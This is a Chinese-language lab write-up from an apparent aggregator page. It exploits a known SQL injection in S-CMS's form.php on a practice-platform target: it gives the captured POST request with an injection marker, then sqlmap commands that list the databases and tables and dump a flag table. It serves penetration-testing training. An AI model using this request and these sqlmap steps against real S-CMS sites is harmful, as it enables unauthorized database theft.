【安鸾渗透实战平台】实战渗透/企业网站

这篇具有很好参考价值的文章主要介绍了【安鸾渗透实战平台】实战渗透/企业网站。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

总体思路


  1. 通过title得知网站为s-cms
  2. 搜索引擎搜索s-cms历史漏洞 : 找到sql注入
  3. sqlmap梭哈找到flag

分步演示


1. 查看title,发现为s-cms建站
sscms 漏洞,靶场,web安全,安全
2. 查找s-scms历史漏洞,找到 form.php 存在sql注入 | sleep语句成功执行
sscms 漏洞,靶场,web安全,安全
3. 在Q_sort=1后加 * ,将数据包保存为1.txt:

POST /form.php?action=query&S_id=0 HTTP/1.1
Host: 106.15.50.112:8035
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=7bd4d643075464524223fc70d32e7a30; authorization=fail; authorization4=1MHwwfHMxMXxzMTA0fHM5NHxzOTV8czk5fHM5Nnx3NHx3OTR8dzk1fHc5Nnx3MTA0fHBjMTM1fHBjMTQ2fHBjMTA0fHBjOTR8cGM5NXxwYzk5fHBjOTZ8d2FwMTM1fHdhcDE0Nnx3YXA5NHx3YXA5NXx3YXA5Nnx3YXAxMDR8; __tins__18885840=%7B%22sid%22%3A%201668687646080%2C%20%22vd%22%3A%2020%2C%20%22expires%22%3A%201668689481280%7D; __51cke__=; __51laig__=20
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

Q_sort=1*

4. sqlmap 跑数据包

sqlmap -r D:\sqlmap-txt\1.txt --batch

sscms 漏洞,靶场,web安全,安全
5. 读库 | 使用联合查询, 速度较快

sqlmap -r D:\sqlmap-txt\1.txt --tech U --dbs --batch

sscms 漏洞,靶场,web安全,安全
6. 查看scms库的所有表

sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms --tables --batch

sscms 漏洞,靶场,web安全,安全
7. 查看SL_flag表的所有字段

sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag --columns --batch

sscms 漏洞,靶场,web安全,安全
8. 读取flag字段内容

sqlmap -r D:\sqlmap-txt\1.txt --tech U -D scms -T SL_flag -C "flag" --dump --batch

sscms 漏洞,靶场,web安全,安全

sscms 漏洞,靶场,web安全,安全文章来源地址https://www.toymoban.com/news/detail-552154.html

到了这里,关于【安鸾渗透实战平台】实战渗透/企业网站的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 如何在企业网站里做好网络安全

    在当今数字时代,网站不仅仅是企业宣传和产品展示的平台,更是日常生活和商业活动中不可或缺的一部分。然而,随着网络技术不断发展,网站的安全问题日益凸显。保护网站和用户数据的安全已经成为至关重要的任务,以下是一些关键的网站安全措施,可帮助您确保在线

    2024年02月07日
    浏览(48)
  • SpringBoot + Vue 企业门户宣传网站

    项目的初衷是给某某公司做一个产品宣传网页,由于第一次做这种宣传网页没有太多的灵感于是到网上去找了一些模板,但是发现网上现有的模板大多都是基于php语言开发的。但是甲方需要我们使用最新的前后端分离的开发方式来开发,于是决定使用 springboot + vue 来来发这个

    2024年02月06日
    浏览(51)
  • 企业网站建设中常用的英文翻译

    下面好代码网在长期的网站建设业务中总结的,一些在企业网站建设中词语的常用翻译,可以让你的企业网站更具有专业性。如果你做中英文双语版本网站或者外贸网站的请收藏备用。 网站导航 site map 公司简介 PROFILE or COMPANY Profile or Company 综述 General 业绩 Achievements 求贤纳士

    2024年02月02日
    浏览(83)
  • lnmp +redis 发布企业门户网站( 单机部署)

    lnmp +redis 发布企业门户网站( 单机部署) 操作系统环境:Centos 7.9 服务器IP:172.20.26.140 1、部署lnmp yum install epel-release -y yum install yum-utils 创建新的nginx.repo文件: vim /etc/yum.repos.d/nginx.repo 添加 [nginx-stable] name=nginx stable repo baseurl=http://nginx.org/packages/centos/$releasever/$basearch/ gpgcheck=1

    2024年01月22日
    浏览(44)
  • 对于大连企业而言如何提升网站的曝光率

    对于大连企业而言,提升网站的曝光率是非常重要的,可以通过以下几种方式来实现: 1. 优化网站结构和内容:确保网站的结构清晰,布局合理,并且内容丰富、有吸引力。网站的页面加载速度也要快,以提升用户体验和搜索引擎的排名。   2. 优化:通过研究

    2024年02月12日
    浏览(35)
  • 数据智能化管理:企业网站备案信息API的应用案例

    引言 在数字化时代,企业备案信息管理变得愈发重要。无论是为了合规性还是提高业务运营效率,企业都需要有效管理其网站备案信息。幸运的是,现代技术为企业提供了强大的工具,如企业网站备案信息API,可帮助他们更智能地管理这些数据。本文将深入探讨企业网站备案

    2024年02月06日
    浏览(50)
  • PHP大型企业人才招聘网站源码带文字安装教程

    PHP大型企业人才招聘网站源码带文字安装教程 运行环境 服务器宝塔面板 PHP 5.6 Mysql 5.5及以上版本 Linux Centos7以上 功能说明: 会员模块包括企业管理、职位管理、名企管理、企业认证审核、 企业设置。内容模块包括新闻管理、新闻类别、新闻属性、添加新闻。 运营模块包括

    2024年02月02日
    浏览(47)
  • 网站本地化翻译、建设助力企业拓展全球市场 安睿杰翻译

    企业开展海外业务,建立面向目标地区或国家的海外站或独立站,离不开网站的本地化。 网站本地化分为:网站本地化翻译、网站本地化建设。 【网站本地化翻译】是指将网站的文本、图片、音频、视频等内容中的语言转换成目标地区用户的母语。 【网站本地化建设】是指

    2024年01月25日
    浏览(79)
  • 大一Web课程设计:企业网站——HTML+CSS+JavaScript电子购物商城(37页面)

    常见网页设计作业题材有 个人、 美食、 公司、 学校、 旅游、 电商、 宠物、 电器、 茶叶、 家居、 酒店、 舞蹈、 动漫、 服装、 体育、 化妆品、 物流、 环保、 书籍、 婚纱、 游戏、 节日、 戒烟、 电影、 摄影、 文化、 家乡、 鲜花、 礼品、 汽车、 其他等网页设计题目

    2024年02月03日
    浏览(69)
  • 【Linux系统基础快速入门详解】根据计算机硬件特性优化企业网站集群性能方案

    鱼弦:CSDN内容合伙人、CSDN新星导师、51CTO(Top红人+专家博主) 、github开源爱好者(go-zero源码二次开发、游戏后端架构 https://github.com/Peakchen) 优化企业网站集群性能是一个复杂的任务,不仅涉及硬件特性的优化,还需要考虑网络架构、负载均衡、缓存策略等多个方面。下面是

    2024年02月07日
    浏览(102)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包